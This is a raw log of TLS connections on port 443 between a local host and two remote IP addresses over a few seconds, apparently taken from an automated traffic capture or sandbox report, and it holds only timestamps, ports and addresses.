Nov 4, 2024 17:31:42.427145004 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.470051050 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.470797062 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.470886946 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.470956087 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.470956087 CET	49806	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.470976114 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.470987082 CET	443	49806	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.473562002 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.473603964 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.473695993 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.473870039 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.473884106 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.493104935 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:42.493155956 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:42.493262053 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:42.493855000 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:42.493870974 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:42.528384924 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.528956890 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.528990984 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.529427052 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.529433012 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.557990074 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.558057070 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.558150053 CET	49807	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.558384895 CET	49807	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.558407068 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.558419943 CET	49807	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.558425903 CET	443	49807	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.561146021 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.561172009 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.561253071 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.561383963 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.561395884 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.669342041 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.669500113 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.669585943 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.669822931 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.669845104 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.669851065 CET	49808	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.669857979 CET	443	49808	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.672689915 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.672725916 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.672833920 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.672977924 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.672993898 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.976968050 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.997797012 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.997806072 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:42.998409033 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:42.998429060 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.125582933 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.125658989 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.125755072 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.126219034 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.126235962 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.126277924 CET	49809	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.126285076 CET	443	49809	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.147852898 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.147912025 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.147989988 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.148199081 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.148214102 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.246735096 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.250307083 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.250319004 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.250772953 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.250778913 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.316956043 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.317702055 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.317729950 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.318437099 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.318443060 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.385617971 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.385693073 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.385751963 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.392471075 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.392507076 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.392537117 CET	49810	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.392544985 CET	443	49810	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.396008015 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.396042109 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.396125078 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.396600008 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.396614075 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.407387018 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.407767057 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.407783985 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.408211946 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.408217907 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.444726944 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.444789886 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.444844007 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.447518110 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.447535992 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.447556019 CET	49812	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.447562933 CET	443	49812	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.450396061 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.450428009 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.450493097 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.450727940 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.450737953 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.541342974 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.541414022 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.541500092 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.543042898 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.543042898 CET	49813	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.543068886 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.543080091 CET	443	49813	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.545732975 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.545777082 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.545864105 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.546014071 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.546030998 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.611346960 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:43.611491919 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.613444090 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.613454103 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:43.613702059 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:43.619985104 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.626614094 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.626621962 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:43.626733065 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.667331934 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:43.877530098 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.877568960 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:43.878206968 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.878206968 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.878232002 CET	443	49811	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:43.878251076 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.878278971 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.878293037 CET	49811	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:43.878829002 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.878842115 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.952558041 CET	49732	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.955893993 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.955933094 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:43.956031084 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.956259966 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:43.956271887 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.006789923 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.006849051 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.006987095 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.007229090 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.007244110 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.007251024 CET	49814	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.007256985 CET	443	49814	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.009787083 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.009826899 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.009962082 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.010262966 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.010284901 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.069627047 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:44.069658995 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:44.069745064 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:44.070435047 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:44.070446014 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:44.142399073 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.143057108 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.143079042 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.143523932 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.143534899 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.230330944 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.234718084 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.234743118 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.235212088 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.235224009 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.275058985 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.275140047 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.275264978 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.275500059 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.275500059 CET	49815	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.275515079 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.275523901 CET	443	49815	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.278299093 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.278337002 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.278412104 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.278611898 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.278625965 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.290080070 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.298443079 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.298456907 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.299140930 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.299144983 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.371817112 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.371890068 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.371979952 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.372210979 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.372231960 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.372243881 CET	49816	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.372250080 CET	443	49816	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.374772072 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.374808073 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.374903917 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.375124931 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.375135899 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.427423954 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.427459002 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.427525997 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.427578926 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.427632093 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.427938938 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.427954912 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.427964926 CET	49817	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.427972078 CET	443	49817	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.431188107 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.431236029 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.431332111 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.431535006 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.431549072 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.738596916 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.738666058 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.739850998 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.739860058 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.740086079 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.741770029 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.742583036 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.742677927 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.743706942 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.743715048 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.743942022 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.744558096 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.783335924 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.787338018 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.870971918 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.871033907 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.871265888 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.871308088 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.871335983 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.871349096 CET	49818	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.871356010 CET	443	49818	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.873970985 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.874017000 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.874099016 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.874264956 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.874274969 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.875705957 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.875731945 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.875771046 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.875801086 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.875852108 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.875946999 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.875962973 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.875972986 CET	49819	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.875978947 CET	443	49819	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.877970934 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.878015041 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:44.878124952 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.878258944 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:44.878271103 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.013365984 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.013452053 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.014740944 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.014746904 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.015022993 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.015945911 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.059329033 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.113492966 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.113711119 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.115104914 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.115113020 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.115377903 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.116203070 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.148682117 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.148765087 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.148829937 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.149053097 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.149079084 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.149095058 CET	49821	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.149101019 CET	443	49821	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.152115107 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.152158976 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.152309895 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.152590036 CET	49826	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.152600050 CET	443	49826	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.159327030 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.159712076 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.159782887 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.161040068 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.161051035 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.161303997 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.162149906 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.178227901 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:45.178303003 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.180135965 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.180143118 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:45.180417061 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:45.182210922 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.182377100 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.182384014 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:45.182478905 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.203335047 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.223329067 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:45.243273020 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.243355036 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.243407965 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.243549109 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.243570089 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.243587971 CET	49822	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.243594885 CET	443	49822	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.246108055 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.246139050 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.246295929 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.246541023 CET	49827	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.246565104 CET	443	49827	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.288408995 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.288547039 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.288606882 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.290214062 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.290231943 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.290241957 CET	49823	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.290249109 CET	443	49823	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.293343067 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.293389082 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.293502092 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.293824911 CET	49828	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.293837070 CET	443	49828	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.431471109 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:45.431991100 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.431999922 CET	443	49820	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:45.432018042 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.432066917 CET	49820	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:45.612138987 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.612574100 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.612590075 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.613509893 CET	49824	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.613519907 CET	443	49824	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.618654966 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.619292021 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.619314909 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.619820118 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.619826078 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.749692917 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.749908924 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.749963045 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.750102043 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.750102043 CET	49825	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:45.750121117 CET	443	49825	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:45.750132084 CET	443	49825	13.107.246.45	192.168.2.5
